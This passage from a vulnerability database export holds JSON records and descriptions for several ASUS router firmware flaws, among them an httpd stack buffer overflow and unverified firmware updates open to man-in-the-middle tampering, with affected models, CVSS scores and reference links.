          {
            "title": "Top Page",
            "trust": 0.8,
            "url": "https://asuswrt.lostrealm.ca/"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-005985"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-119",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-101841"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-005985"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-11420"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 3.1,
            "url": "http://www.openwall.com/lists/oss-security/2017/07/13/1"
          },
          {
            "trust": 1.1,
            "url": "https://asuswrt.lostrealm.ca/changelog"
          },
          {
            "trust": 0.8,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-11420"
          },
          {
            "trust": 0.8,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2017-11420"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-24400"
          },
          {
            "db": "VULHUB",
            "id": "VHN-101841"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-005985"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201707-754"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-11420"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-24400"
          },
          {
            "db": "VULHUB",
            "id": "VHN-101841"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-005985"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201707-754"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-11420"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2017-09-03T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2017-24400"
          },
          {
            "date": "2017-07-18T00:00:00",
            "db": "VULHUB",
            "id": "VHN-101841"
          },
          {
            "date": "2017-08-14T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2017-005985"
          },
          {
            "date": "2017-07-19T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201707-754"
          },
          {
            "date": "2017-07-18T05:29:00.470000",
            "db": "NVD",
            "id": "CVE-2017-11420"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2017-09-03T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2017-24400"
          },
          {
            "date": "2017-12-20T00:00:00",
            "db": "VULHUB",
            "id": "VHN-101841"
          },
          {
            "date": "2017-08-14T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2017-005985"
          },
          {
            "date": "2017-07-19T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201707-754"
          },
          {
            "date": "2025-04-20T01:37:25.860000",
            "db": "NVD",
            "id": "CVE-2017-11420"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201707-754"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "plural  ASUS For devices  Asuswrt-Merlin Firmware and  ASUS Firmware network map  ASUS_Discovery.c Vulnerable to stack-based buffer overflow",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-005985"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "buffer overflow",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201707-754"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201708-1179

    Vulnerability from variot - Updated: 2025-04-20 23:23

    Stack buffer overflow in httpd in Asuswrt-Merlin firmware 380.67_0RT-AC5300 and earlier for ASUS devices and ASUS firmware for ASUS RT-AC5300, RT_AC1900P, RT-AC68U, RT-AC68P, RT-AC88U, RT-AC66U, RT-AC66U_B1, RT-AC58U, RT-AC56U, RT-AC55U, RT-AC52U, RT-AC51U, RT-N18U, RT-N66U, RT-N56U, RT-AC3200, RT-AC3100, RT_AC1200GU, RT_AC1200G, RT-AC1200, RT-AC53, RT-N12HP, RT-N12HP_B1, RT-N12D1, RT-N12+, RT_N12+_PRO, RT-N16, and RT-N300 devices allows remote attackers to execute arbitrary code on the router by sending a crafted http GET request packet that includes a long delete_offline_client parameter in the url. plural ASUS For devices Asuswrt-Merlin Firmware and ASUS The firmware contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. ASUSRT-AC5300 and others are wireless routers from ASUS. ASUSAsuswrt-Merlin is the firmware running in it. Httpd is one of the embedded http servers. A stack buffer overflow vulnerability exists in Asuswrt-Merlin380.67_0RT-AC5300 and previous versions of httpd in several ASUS products

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201708-1179",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "rt-n66u",
            "scope": null,
            "trust": 1.2,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "asuswrt-merlin",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asuswrt merlin",
            "version": "380.67"
          },
          {
            "model": "asuswrt-merlin",
            "scope": null,
            "trust": 0.8,
            "vendor": "asuswrt merlin",
            "version": null
          },
          {
            "model": "rt-ac5300",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt ac1900p",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-ac68u",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-ac52u",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-ac51u",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-n18u",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-n56u",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-ac3200",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-ac3100",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-ac1200",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-n12hp",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-n12hp b1",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-n12d1",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-n12+",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-n16",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-n300",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "asuswrt-merlin \u003c=380.67 0rt-ac5300",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-ac55u",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-ac56u",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-ac58u",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-ac66u b1",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-ac66u",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-ac88u",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-ac68p",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "asuswrt-merlin",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "asuswrt",
            "version": "380.67_0"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-32450"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-007274"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201708-443"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-12754"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:asuswrt-merlin_project:asuswrt-merlin",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-007274"
          }
        ]
      },
      "cve": "CVE-2017-12754",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "PARTIAL",
                "baseScore": 6.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.0,
                "id": "CVE-2017-12754",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 1.8,
                "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "CNVD",
                "availabilityImpact": "PARTIAL",
                "baseScore": 6.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.0,
                "id": "CNVD-2017-32450",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 8.8,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 2.8,
                "id": "CVE-2017-12754",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "LOW",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 8.8,
                "baseSeverity": "High",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2017-12754",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "Low",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2017-12754",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "NVD",
                "id": "CVE-2017-12754",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2017-32450",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201708-443",
                "trust": 0.6,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-32450"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-007274"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201708-443"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-12754"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Stack buffer overflow in httpd in Asuswrt-Merlin firmware 380.67_0RT-AC5300 and earlier for ASUS devices and ASUS firmware for ASUS RT-AC5300, RT_AC1900P, RT-AC68U, RT-AC68P, RT-AC88U, RT-AC66U, RT-AC66U_B1, RT-AC58U, RT-AC56U, RT-AC55U, RT-AC52U, RT-AC51U, RT-N18U, RT-N66U, RT-N56U, RT-AC3200, RT-AC3100, RT_AC1200GU, RT_AC1200G, RT-AC1200, RT-AC53, RT-N12HP, RT-N12HP_B1, RT-N12D1, RT-N12+, RT_N12+_PRO, RT-N16, and RT-N300 devices allows remote attackers to execute arbitrary code on the router by sending a crafted http GET request packet that includes a long delete_offline_client parameter in the url. plural ASUS For devices Asuswrt-Merlin Firmware and ASUS The firmware contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. ASUSRT-AC5300 and others are wireless routers from ASUS. ASUSAsuswrt-Merlin is the firmware running in it. Httpd is one of the embedded http servers. A stack buffer overflow vulnerability exists in Asuswrt-Merlin380.67_0RT-AC5300 and previous versions of httpd in several ASUS products",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2017-12754"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-007274"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-32450"
          }
        ],
        "trust": 2.16
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2017-12754",
            "trust": 3.0
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-007274",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-32450",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201708-443",
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-32450"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-007274"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201708-443"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-12754"
          }
        ]
      },
      "id": "VAR-201708-1179",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-32450"
          }
        ],
        "trust": 1.2386813426923076
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-32450"
          }
        ]
      },
      "last_update_date": "2025-04-20T23:23:37.803000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Top Page",
            "trust": 0.8,
            "url": "https://asuswrt.lostrealm.ca/"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-007274"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-119",
            "trust": 1.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-007274"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-12754"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 3.0,
            "url": "https://github.com/coincoin7/wireless-router-vulnerability/blob/master/asus_deleteofflineclientoverflow.txt"
          },
          {
            "trust": 1.6,
            "url": "https://asuswrt.lostrealm.ca/changelog"
          },
          {
            "trust": 0.8,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-12754"
          },
          {
            "trust": 0.8,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2017-12754"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-32450"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-007274"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201708-443"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-12754"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-32450"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-007274"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201708-443"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-12754"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2017-11-02T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2017-32450"
          },
          {
            "date": "2017-09-15T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2017-007274"
          },
          {
            "date": "2017-08-09T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201708-443"
          },
          {
            "date": "2017-08-09T15:29:00.183000",
            "db": "NVD",
            "id": "CVE-2017-12754"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2017-11-02T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2017-32450"
          },
          {
            "date": "2017-09-15T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2017-007274"
          },
          {
            "date": "2020-05-28T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201708-443"
          },
          {
            "date": "2025-04-20T01:37:25.860000",
            "db": "NVD",
            "id": "CVE-2017-12754"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201708-443"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "plural  ASUS For devices  Asuswrt-Merlin Firmware and  ASUS Firmware buffer error vulnerability",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-007274"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "buffer error",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201708-443"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201411-0483

    Vulnerability from variot - Updated: 2025-04-13 23:27

    ASUS RT-AC68U, RT-AC66R, RT-AC66U, RT-AC56R, RT-AC56U, RT-N66R, RT-N66U, RT-N56R, RT-N56U, and possibly other RT-series routers before firmware 3.0.0.4.376.x do not verify the integrity of firmware (1) update information or (2) downloaded updates, which allows man-in-the-middle (MITM) attackers to execute arbitrary code via a crafted image. Supplementary information : CWE Vulnerability type by CWE-345: Insufficient Verification of Data Authenticity ( Inadequate verification of data reliability ) Has been identified. ASUS RT-Series Wireless Routers is a wireless router device. There is a middleman security bypass vulnerability in ASUS RT Series Wireless Routers. An attacker can exploit a vulnerability to bypass certain restrictions and obtain sensitive information. The following products are affected: ASUS RT-AC68U, RT-AC66R, RT-AC66U, RT-AC56R, RT-AC56U, RT-N66R, RT-N66U, RT-N56R, RT-N56U. In short, the router downloads via clear-text a file from http://dlcdnet.asus.com, parses it to determine the latest firmware version, then downloads (again in the clear) a binary file matching that version number from the same web site. No HTTP = no assurance that the site on the other end is the legitimate ASUS web site, and no assurance that the firmware file and version lookup table have not been modified in transit.

    In the link below I describe the issue in detail, and demonstrate a proof of concept through which I successfully caused an RT-AC66R to "upgrade" to an older firmware with known vulnerabilities. In concept it should also be possible to deliver a fully custom malicious firmware in the same manner.

    This applies to the RT-AC68U, RT-AC68U, RT-AC66R, RT-AC66U, RT-AC56R, RT-AC56U, RT-N66R, RT-N66U, RT-N56R, RT-N56U. It may also apply to the RT-N53, RT-N14U, RT-N16, and RT-N16R since they use the same firmware base but a different sub-version.

    This has been fixed as an undocumented feature of the 376 firmware branch (3.0.0.4.376.x).

    Details and POC: http://dnlongen.blogspot.com/2014/10/CVE-2014-2718-Asus-RT-MITM.html

    -- Regards, David Longenecker @dnlongen

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201411-0483",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "tm-ac1900",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "t mobile",
            "version": "3.0.0.4.376_3169"
          },
          {
            "model": "rt series",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.374.x"
          },
          {
            "model": "rt",
            "scope": "lt",
            "trust": 0.8,
            "vendor": "asustek computer",
            "version": "3.0.0.4.376.x"
          },
          {
            "model": "rt-series wireless routers",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-n66u",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "asus",
            "version": "0"
          },
          {
            "model": "rt-n66r",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "asus",
            "version": "0"
          },
          {
            "model": "rt-n56u",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "asus",
            "version": "0"
          },
          {
            "model": "rt-n56r",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "asus",
            "version": "0"
          },
          {
            "model": "rt-n53",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "asus",
            "version": "0"
          },
          {
            "model": "rt-n16r",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "asus",
            "version": "0"
          },
          {
            "model": "rt-n16",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "asus",
            "version": "0"
          },
          {
            "model": "rt-n14u",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "asus",
            "version": "0"
          },
          {
            "model": "rt-ac68u",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "asus",
            "version": "0"
          },
          {
            "model": "rt-ac66u",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "asus",
            "version": "0"
          },
          {
            "model": "rt-ac66r",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "asus",
            "version": "0"
          },
          {
            "model": "rt-ac56u",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "asus",
            "version": "0"
          },
          {
            "model": "rt-ac56r",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "asus",
            "version": "0"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
